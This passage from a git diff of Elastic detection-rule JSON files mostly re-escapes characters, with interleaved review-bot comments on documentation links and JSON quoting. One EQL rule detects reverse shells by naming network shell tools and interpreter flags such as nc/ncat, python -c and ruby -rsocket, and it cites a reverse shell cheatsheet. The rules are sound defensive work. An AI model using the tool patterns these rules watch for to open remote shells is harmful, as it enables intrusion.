Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json index f6de83ceb7c..00c6cfe5be3 100644 --- a/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json +++ b/packages/security_detection_engine/kibana/security_rule/766d3f91-3f12-448c-b65f-20123e9e9e8c_108.json 
@@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "766d3f91-3f12-448c-b65f-20123e9e9e8c", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json index a5d9a634271..0e55e02b8e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json +++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_103.json 
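Review bot: The new-side `setup` text of the `_108` file links the agent-policy guide as `https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html`, the only version-pinned URL in that string, while every other guide link in it uses `current`. A pinned doc URL goes stale once that release drops out of the docs rotation, and readers deploying with this 8.12 package are steered to 8.10 guidance. The consistent form is `https://www.elastic.co/guide/en/fleet/current/agent-policy.html`. The `_106` and `_107` snapshots in the hunks above carry the same link, so if these JSON files are generated from an upstream rule source, as the versioned filenames suggest, the correction presumably belongs there rather than in the mirrored copies.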
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Privilege Escalation via Rogue Named Pipe Impersonation",
- "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n",
 "references": [
 "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/",
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241",
- "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \u0026quot;contains\u0026quot; and keyword equal \u0026quot;pipe\u0026quot;`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json
index 850f8c6144c..80c369615fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_104.json
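Review bot: On the new side of the `setup` line the Sysmon snippet appears as `condition equal "contains" and keyword equal "pipe"` with bare double quotes inside a JSON string, whereas the `note` field of the same rule in the previous hunk escapes them as `\"contains\"`. The old side held `\u0026quot;`, i.e. the HTML entity `&quot;` double-encoded into JSON, so either the committed file still contains the literal text `&quot;contains&quot;` and this page's renderer decoded it, or the encoder really emitted a raw `"`, which would make the file invalid JSON; which of the two it is cannot be told from here and is worth checking with a strict parser such as `jq . <file>`. If the entity survived, operators will see `&quot;` verbatim in any consumer whose markdown renderer does not decode HTML entities, and since this is the Sysmon configuration they are told to copy, the text should read `` `condition equal \"contains\" and keyword equal \"pipe\"` `` as the `_105` snapshot of this rule already does. The `_104` file's `setup` hunk below shows the same pattern.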
@@ -12,7 +12,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Privilege Escalation via Rogue Named Pipe Impersonation",
- "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "note": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "query": "file where host.os.type == \"windows\" and event.action : \"Pipe Created*\" and\n /* normal sysmon named pipe creation events truncate the pipe keyword */\n file.name : \"\\\\*\\\\Pipe\\\\*\"\n",
 "references": [
 "https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/",
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241",
- "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \u0026quot;contains\u0026quot; and keyword equal \u0026quot;pipe\u0026quot;`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Named Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal "contains" and keyword equal "pipe"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json
index 2253e4dc542..5c4e2496b12 100644
--- a/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/76ddb638-abf7-42d5-be22-4a70b0bf7241_105.json
@@ -43,7 +43,7 @@ ], "risk_score": 73, "rule_id": "76ddb638-abf7-42d5-be22-4a70b0bf7241", - "setup": "\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nNamed Pipe Creation Events need to be enabled within the Sysmon configuration by including the following settings:\n`condition equal \"contains\" and keyword equal \"pipe\"`\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json index 386d2c47244..1dfe4c1fc6c 100644 
--- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_1.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", 
\"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json index 7b777d7fc15..9e44f5c454e 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : \"telnet\" and process.args_count >= 
3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json index 8757d31d36a..1b455b0cc83 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count >= 3) or\n (process.name : 
\"telnet\" and process.args_count >= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", "references": [ "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" ], @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -106,7 +106,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json index e02f4ce40f9..2262946080c 100644 --- a/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json +++ b/packages/security_detection_engine/kibana/security_rule/76e4d92b-61c1-4a95-ab61-5fd94179a1ee_4.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Reverse Shell via Suspicious Child Process", - "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : \"-connect\") or\n (process.name : (\"nc\", \"ncat\", \"netcat\") and process.args_count \u003e= 3) or\n (process.name : \"telnet\" and process.args_count \u003e= 3) or\n (process.name : \"awk\")) and \n process.parent.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") ]\n[ network where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\") and\n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" ]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and (\n (process.name : \"python*\" and process.args : \"-c\") or\n (process.name : \"php*\" and process.args : \"-r\") or\n (process.name : \"perl\" and process.args : \"-e\") or\n (process.name : \"ruby\" and process.args : (\"-e\", \"-rsocket\")) or\n (process.name : \"lua*\" and process.args : \"-e\") or\n (process.name : \"openssl\" and process.args : 